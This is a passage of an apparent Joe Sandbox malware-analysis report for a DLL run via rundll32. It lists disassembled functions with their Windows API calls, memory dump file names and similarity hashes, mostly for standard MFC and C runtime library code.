                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                                                                          • String ID:
                                                                                                          • API String ID: 964565984-0
                                                                                                          • Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
                                                                                                          • Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                                                                                                          • Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10028C9F, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
                                                                                                          • String ID: AfxOldWndProc423
                                                                                                          • API String ID: 2109165785-1060338832
                                                                                                          • Opcode ID: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction ID: ff35111d89a6fae3ee79e979b08ab4de06e021ef9fe06013c3cb9f10e1bb71d8
                                                                                                          • Opcode Fuzzy Hash: dccbfa165b239661d1f4eaae413e83b7f4de832619f3524192097b6a1288ccad
                                                                                                          • Instruction Fuzzy Hash: FB31843A80111ABBDF02DFA0EE49DBF7BB8FF46341F800519FA05A50A1C7759A14DBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B9A0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetStockObject.GDI32(00000011), ref: 1002B9C8
                                                                                                          • GetStockObject.GDI32(0000000D), ref: 1002B9D0
                                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
                                                                                                          • GetDC.USER32(00000000), ref: 1002B9EC
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
                                                                                                          • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
                                                                                                          • ReleaseDC.USER32 ref: 1002BA18
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Stock$CapsDeviceRelease
                                                                                                          • String ID: System
                                                                                                          • API String ID: 46613423-3470857405
                                                                                                          • Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
                                                                                                          • Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                                                                                                          • Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1001E790, Relevance: 13.6, APIs: 9, Instructions: 105windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 1001E7D5
                                                                                                          • SendMessageA.USER32(?,000000B1,?,?), ref: 1001E7FB
                                                                                                          • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 1001E815
                                                                                                          • SendMessageA.USER32(?,000000C2,00000000,?), ref: 1001E839
                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,?), ref: 1001E86E
                                                                                                          • SendMessageA.USER32(00000000,000000B7,00000000,00000000), ref: 1001E888
                                                                                                          • SendMessageA.USER32(?,000000C2,00000000,1004B96C), ref: 1001E8A4
                                                                                                          • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 1001E8BD
                                                                                                          • SendMessageA.USER32(?,000000B6,00000000,?), ref: 1001E8DB
                                                                                                            • Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E5FA
                                                                                                            • Part of subcall function 1001E520: _strlen.LIBCMT ref: 1001E614
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3697954797-0
                                                                                                          • Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
                                                                                                          • Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                                                                                                          • Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002AF6B, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AF72
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
                                                                                                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
                                                                                                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                                                                                                          • _memset.LIBCMT ref: 1002B060
                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1891723912-0
                                                                                                          • Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                                                                                                          • Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
                                                                                                          • Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                                                                                                          • Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001920, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10001982
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8Throw
                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                          • Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
                                                                                                          • Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                                                                                                          • Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10021F51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
                                                                                                            • Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
                                                                                                            • Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
                                                                                                            • Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10021F9E
                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 10021FBC
                                                                                                          • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 10021FD4
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
                                                                                                          • EnableWindow.USER32(00000000,00000001), ref: 10022093
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1877664794-4108050209
                                                                                                          • Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                                                                                                          • Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
                                                                                                          • Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                                                                                                          • Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002104C
                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                                                                                                          • GlobalLock.KERNEL32 ref: 1002109C
                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                                                                                                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                                                                                                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                                                                                                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 168474834-0
                                                                                                          • Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
                                                                                                          • Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                                                                                                          • Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002A98E, Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A99D
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9A4
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9AB
                                                                                                          • GetSystemMetrics.USER32 ref: 1002A9B5
                                                                                                          • GetDC.USER32(00000000), ref: 1002A9BF
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 1002A9D0
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002A9D8
                                                                                                          • ReleaseDC.USER32 ref: 1002A9E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1151147025-0
                                                                                                          • Opcode ID: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction ID: 4b18a5fc2a191a652713761d43d2b2da4b0cc28fbe92607e78cb1662e9ca01b2
                                                                                                          • Opcode Fuzzy Hash: 97df97701bdba165d7bd0f3935d33a7940ab39bf43f5bcde9822dd001b09b376
                                                                                                          • Instruction Fuzzy Hash: 0CF0F9B1E40724BAF7105F728C89B167EA8FB49761F004456E6199B281DAB599118FD0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10001D60, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen$IconLoad_memset
                                                                                                          • String ID: ^t$127.0.0.1
                                                                                                          • API String ID: 858515944-3506571716
                                                                                                          • Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
                                                                                                          • Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
                                                                                                          • Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
                                                                                                          • Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalLock.KERNEL32 ref: 1002B878
                                                                                                          • lstrlenA.KERNEL32(?), ref: 1002B8C3
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
                                                                                                          • _wcslen.LIBCMT ref: 1002B901
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                                                                                                          • String ID: System
                                                                                                          • API String ID: 4253822919-3470857405
                                                                                                          • Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
                                                                                                          • Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                                                                                                          • Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 100270EF
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 10027113
                                                                                                          • UpdateWindow.USER32(?), ref: 1002712E
                                                                                                          • SendMessageA.USER32(?,00000121,00000000,?), ref: 1002714F
                                                                                                          • SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 10027167
                                                                                                          • UpdateWindow.USER32(?), ref: 100271AA
                                                                                                          • PeekMessageA.USER32(00000024,00000000,00000000,00000000,00000000), ref: 100271DB
                                                                                                            • Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853195852-0
                                                                                                          • Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
                                                                                                          • Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
                                                                                                          • Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670838160.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670833699.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670880299.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670888770.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670893843.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670924327.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670929793.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670945387.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend_memset
                                                                                                          • String ID: ,
                                                                                                          • API String ID: 2997958587-3772416878
                                                                                                          • Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
